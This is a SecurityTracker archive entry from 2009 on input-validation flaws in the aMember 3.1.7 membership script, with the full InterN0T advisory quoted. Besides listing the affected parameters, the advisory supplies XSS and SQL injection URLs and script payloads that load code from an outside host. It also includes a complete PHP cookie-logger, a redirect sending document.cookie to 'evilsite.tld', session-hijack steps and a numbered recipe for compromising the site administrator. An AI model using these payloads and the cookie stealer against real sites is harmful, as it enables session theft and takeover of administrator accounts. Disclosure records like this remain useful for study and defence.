SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   aMember Vendors:   AMEMBER.com
aMember Input Validation Flaws Permit Cross-Site Scripting and SQL Injection Attacks
SecurityTracker Alert ID:  1022277
SecurityTracker URL:  http://securitytracker.com/id/1022277
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 26 2009
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 3.1.7
Description:   Several vulnerabilities were reported in aMember. A remote user can conduct cross-site scripting attacks. A remote authenticated administrator can inject SQL commands. A remote user can obtain potentially sensitive information.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the aMember software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'letter', 'status', and 'action' parameters of '/admin/users.php' are affected.

The 'notebook' parameter of '/admin/setup.php' is affected.

The 'thread_id' parameter of '/admin/newsletter_threads.php' is affected.

The 'guest_id' parameter of '/admin/newsletter_guests.php' is affected.

The 'action' parameter of '/admin/products.php', '/admin/protect.php', and '/admin/coupons.php' is affected.

The 'banner_id' parameter of '/admin/aff_banners.php' is affected.

The 'tpl' parameter of '/admin/email_templates.php' is affected.

Several scripts are subject to HTML injection attacks, including 'signup.php', 'aff_signup.php', and 'profile.php'.

The software does not properly validate user-supplied input. A remote authenticated administrative user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

The 'order1' parameter of '/admin/access_log.php' is affected.

The 'year_month' parameter of '/admin/aff_clicks.php' is affected.

The 'product_id' parameter of '/admin/products.php' is affected.

A remote user can load the following type of URL to obtain version information for the installed application:

http://[target]/amember/docs/changelog.txt

A remote user can load the following type of URLs to determine the installation path:

http://[target]/amember/docs/tester.php
http://[target]/amember/setup.php?step='
http://[target]/amember/admin/report.php?report=' (admin only)

Other files are also affected.

Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the aMember software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote authenticated administrative user can execute SQL commands on the underlying database.

A remote user can obtain potentially sensitive information.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.amember.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

AMember - Multiple Vulnerabilities

Version Affected: 3.1.7 (Apr-10-2009) (newest)

Info: aMember is a flexible membership and subscription management PHP script. It has support for
PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling,
Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and
allows you to setup paid-membership areas on your site. It can also be used without any payment
system - you can manage users manually.

aMember Pro also supports integration plugins to link users database with third-party scripts,
for example vBulletin, Joomla, WordPress (see list of integration plugins).
aMember is a perfect membership software for selling digital subscriptions and downloads.

Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS.

Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)

Accurate Googled0rk: (fewer results)

Inaccurate Googled0rk: (more results)

External Links:
http://www.amember.com/
http://www.amember.com/p/Main/Download
http://www.amember.com/p/Main/Demo


-:: The Advisory ::-

Version Information:
http://www.website.tld/amember/docs/changelog.txt

Information Disclosure:
http://www.website.tld/amember/docs/tester.php
http://www.website.tld/amember/setup.php?step='
http://www.website.tld/amember/admin/report.php?report=' (admin only)
- More files are affected. (discloses full path to the file)

Cross Site Scripting (admin only - might not survive a login screen!)
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?status="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/setup.php?notebook=<script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/products.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/protect.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/coupons.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
http://www.website.tld/amember/aff.php?action=<script>alert(0)</script> (this might only affect attacker)
- More files might be affected.

HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.website.tld/amember/signup.php (first- and last-name)
http://www.website.tld/amember/aff_signup.php (first- and last-name)
http://www.website.tld/amember/profile.php (first- and last-name)

HTML Injection Exception: (this injection might only be possible to be seen by the attacker)
http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too)

Affeced Sites (by HTML Injection):
http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive)
http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string
http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection)
http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME
-- More files might be affected.

SQL Injection: (requires admin access)
http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC
http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales
http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL'
-- More files might be affected, the depth of SQL Injection was not checked!


 -:: Solution ::-
All the files are encrypted according to CGI Systems' website.

 Questions and answers (quote)

I've downloaded aMember, but the source code is corrupted. How can I download it again ?
The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology

Which essentially mean i was unable to find any solution to the problem.
I believe this vulnerability might be exploited in the wild due to it is very
easy to find and take advantage of. (if you know what you're looking for)

Addition: The most easy solution would be to use a regular expression to fix this issue.


 -:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)

Protocol resolution in script tags. This particular variant was submitted by &#321;ukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

Firstname: "><script src="//intern0t.net/.j
Lastname: "></script> </
- Works in FireFox but should work in all browsers.

Firstname: "><iframe src="http://google.com
Lastname: "></iframe> </
- Works in all browsers.

Firstname: "><iframe src="//intern0t.net
Lastname: "></iframe> </
- Should work in all browsers as well. (tested in FireFox)

The following is an example of how a cookie stealer will work in conjunction with the exploit:
<script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm

CookieLogger:
<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date
 | COOKIE: $cookie <br>");
    else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date
 | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();
header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf");
?>

When you have gotten a hash from the admin of the victim site you can issue:
Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)

What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php

What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)

2) The file should contain the following:
HTML Code:

document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;

3) Sign up and make you first name: (try aff_signup.php to avoid paying!)
"><script src="//evilsite.tld/.j

4) Make your last name:
"></script> </

5) Make your username:
aaaaaaaaa

6) After signing up, go to profile.php and make sure the first- and last-name are correct.

7) Wait or social engineer the administrator to click: "Browse Users" in his admin panel, that's all!


Conclusion:
The vendor was not contacted due to they have encrypted all of
the files and because i believe in full disclosure and open source!

Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1018-intern0t-amember-3-1-7-multiple-vulnerabilities.html

Disclosure Information:
- Vulnerabilities found early start of May 2009.
- Advisory finished and published 14th May on InterN0T.
- Bugtraq (SecurityFocus) and Milw0rm contacted the 24th May.


All of the best,
MaXe

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC